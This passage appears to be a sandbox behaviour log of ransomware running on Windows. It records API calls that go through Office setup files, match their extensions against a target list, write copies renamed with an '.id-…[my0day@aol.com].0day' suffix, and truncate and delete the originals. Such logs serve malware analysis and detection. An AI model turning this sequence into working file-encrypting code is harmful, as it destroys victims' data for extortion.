lpString2=".XML") returned -1 [0038.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0038.007] lstrlenW (lpString=".zip") returned 4 [0038.007] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.007] lstrlenW (lpString=".rar") returned 4 [0038.007] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.007] lstrlenW (lpString=".bz2") returned 4 [0038.007] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.007] lstrlenW (lpString=".7z") returned 3 [0038.007] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0038.007] lstrlenW (lpString=".dbf") returned 4 [0038.007] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0038.007] lstrlenW (lpString=".1cd") returned 4 [0038.007] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0038.007] lstrlenW (lpString=".jpg") returned 4 [0038.007] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.007] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0038.007] lstrlenW (lpString="InfoPathMUI.XML") returned 15 [0038.007] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0038.007] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1231) returned 1 [0038.008] CloseHandle (hObject=0x1d8) returned 1 [0038.008] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml")) returned 0x20 [0038.008] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0038.008] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0038.008] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0038.008] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0038.008] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0038.033] GetLastError () returned 0x0 [0038.033] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x4cf, lpOverlapped=0x0) returned 1 [0038.035] WriteFile (in: hFile=0x1f4, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x4d0, lpOverlapped=0x0) returned 1 [0038.036] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0038.036] WriteFile (in: hFile=0x1f4, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xf2, lpOverlapped=0x0) returned 1 [0038.036] SetEndOfFile (hFile=0x1f4) returned 1 [0038.036] CloseHandle (hObject=0x1f4) returned 1 [0038.037] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0038.037] SetEndOfFile (hFile=0x1d8) returned 1 [0038.038] CloseHandle (hObject=0x1d8) returned 1 [0038.038] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0038.038] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml")) returned 1 [0038.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0038.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0038.039] lstrlenW (lpString=".doc") returned 4 [0038.039] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.039] lstrlenW (lpString=".docx") returned 5 [0038.039] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0038.039] lstrlenW (lpString=".pdf") returned 4 [0038.039] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.039] lstrlenW (lpString=".xls") returned 4 [0038.039] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.039] lstrlenW (lpString=".xlsx") returned 5 [0038.039] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0038.039] lstrlenW (lpString=".ppt") returned 4 [0038.039] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0038.039] lstrlenW (lpString=".zip") returned 4 [0038.039] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.039] lstrlenW (lpString=".rar") returned 4 [0038.039] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.039] lstrlenW (lpString=".bz2") returned 4 [0038.039] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.039] lstrlenW (lpString=".7z") returned 3 [0038.039] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0038.039] lstrlenW (lpString=".dbf") returned 4 [0038.039] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0038.039] lstrlenW (lpString=".1cd") returned 4 [0038.039] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0038.039] lstrlenW (lpString=".jpg") returned 4 [0038.039] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0038.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0038.040] lstrlenW (lpString=".doc") returned 4 [0038.040] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.040] lstrlenW (lpString=".docx") returned 5 [0038.040] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0038.040] lstrlenW (lpString=".pdf") returned 4 [0038.040] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.040] lstrlenW (lpString=".xls") returned 4 [0038.040] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.040] lstrlenW (lpString=".xlsx") returned 5 [0038.040] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0038.040] lstrlenW (lpString=".ppt") returned 4 [0038.040] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0038.040] lstrlenW (lpString=".zip") returned 4 [0038.040] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.040] lstrlenW (lpString=".rar") returned 4 [0038.040] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.040] lstrlenW (lpString=".bz2") returned 4 [0038.040] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.040] lstrlenW (lpString=".7z") returned 3 [0038.040] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0038.040] lstrlenW (lpString=".dbf") returned 4 [0038.040] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0038.040] lstrlenW (lpString=".1cd") returned 4 [0038.040] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0038.040] lstrlenW (lpString=".jpg") returned 4 [0038.040] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.041] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0038.041] lstrlenW (lpString="SETUP.XML") returned 9 [0038.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0038.041] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1852) returned 1 [0038.041] CloseHandle (hObject=0x1d8) returned 1 [0038.041] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml")) returned 0x20 [0038.041] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0038.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0038.041] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0038.041] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0038.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0038.042] GetLastError () returned 0x0 [0038.042] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x73c, lpOverlapped=0x0) returned 1 [0038.055] WriteFile (in: hFile=0x1f4, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x740, lpOverlapped=0x0) returned 1 [0038.056] ReadFile (in: hFile=0x1d8, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0038.058] WriteFile (in: hFile=0x1f4, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0038.059] SetEndOfFile (hFile=0x1f4) returned 1 [0038.059] CloseHandle (hObject=0x1f4) returned 1 [0038.059] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0038.060] SetEndOfFile (hFile=0x1d8) returned 1 [0038.060] CloseHandle (hObject=0x1d8) returned 1 [0038.060] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0038.061] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml")) returned 1 [0038.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0038.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0038.061] lstrlenW (lpString=".doc") returned 4 [0038.061] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.061] lstrlenW (lpString=".docx") returned 5 [0038.061] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0038.061] lstrlenW (lpString=".pdf") returned 4 [0038.061] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.061] lstrlenW (lpString=".xls") returned 4 [0038.061] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.061] lstrlenW (lpString=".xlsx") returned 5 [0038.061] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0038.061] lstrlenW (lpString=".ppt") returned 4 [0038.062] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0038.062] lstrlenW (lpString=".zip") returned 4 [0038.062] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.062] lstrlenW (lpString=".rar") returned 4 [0038.062] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.062] lstrlenW (lpString=".bz2") returned 4 [0038.062] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.062] lstrlenW (lpString=".7z") returned 3 [0038.062] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0038.062] lstrlenW (lpString=".dbf") returned 4 [0038.062] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0038.062] lstrlenW (lpString=".1cd") returned 4 [0038.062] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0038.062] lstrlenW (lpString=".jpg") returned 4 [0038.062] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.421] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0038.421] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0038.421] lstrlenW (lpString=".doc") returned 4 [0038.421] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.421] lstrlenW (lpString=".docx") returned 5 [0038.421] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0038.421] lstrlenW (lpString=".pdf") returned 4 [0038.421] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.421] lstrlenW (lpString=".xls") returned 4 [0038.421] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.421] lstrlenW (lpString=".xlsx") returned 5 [0038.421] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0038.421] lstrlenW (lpString=".ppt") returned 4 [0038.421] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.421] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0038.421] lstrlenW (lpString=".zip") returned 4 [0038.422] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.422] lstrlenW (lpString=".rar") returned 4 [0038.422] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.422] lstrlenW (lpString=".bz2") returned 4 [0038.422] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.422] lstrlenW (lpString=".7z") returned 3 [0038.422] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0038.422] lstrlenW (lpString=".dbf") returned 4 [0038.422] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0038.422] lstrlenW (lpString=".1cd") returned 4 [0038.422] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0038.422] lstrlenW (lpString=".jpg") returned 4 [0038.422] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.422] lstrcmpiW (lpString1=".CHM", lpString2=".0day") returned 1 [0038.422] lstrlenW (lpString="OCT.CHM") returned 7 [0038.422] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0039.022] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=71236) returned 1 [0039.022] CloseHandle (hObject=0x1c4) returned 1 [0039.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm")) returned 0x20 [0039.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0039.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0039.022] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.022] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0039.022] GetLastError () returned 0x0 [0039.022] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x11644, lpOverlapped=0x0) returned 1 [0039.025] WriteFile (in: hFile=0x1f4, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x11650, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x11650, lpOverlapped=0x0) returned 1 [0039.027] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0039.027] WriteFile (in: hFile=0x1f4, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xe2, lpOverlapped=0x0) returned 1 [0039.027] SetEndOfFile (hFile=0x1f4) returned 1 [0039.027] CloseHandle (hObject=0x1f4) returned 1 [0039.028] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.028] SetEndOfFile (hFile=0x1c4) returned 1 [0039.030] CloseHandle (hObject=0x1c4) returned 1 [0039.030] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0039.030] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm")) returned 1 [0039.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0039.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0039.030] lstrlenW (lpString=".doc") returned 4 [0039.030] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0039.030] lstrlenW (lpString=".docx") returned 5 [0039.030] lstrcmpiW (lpString1=".docx", lpString2="T.CHM") returned -1 [0039.030] lstrlenW (lpString=".pdf") returned 4 [0039.030] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0039.030] lstrlenW (lpString=".xls") returned 4 [0039.030] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0039.030] lstrlenW (lpString=".xlsx") returned 5 [0039.030] lstrcmpiW (lpString1=".xlsx", lpString2="T.CHM") returned -1 [0039.030] lstrlenW (lpString=".ppt") returned 4 [0039.030] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0039.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0039.030] lstrlenW (lpString=".zip") returned 4 [0039.030] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0039.031] lstrlenW (lpString=".rar") returned 4 [0039.031] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0039.031] lstrlenW (lpString=".bz2") returned 4 [0039.031] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0039.031] lstrlenW (lpString=".7z") returned 3 [0039.031] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0039.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0039.031] lstrlenW (lpString=".dbf") returned 4 [0039.031] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0039.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 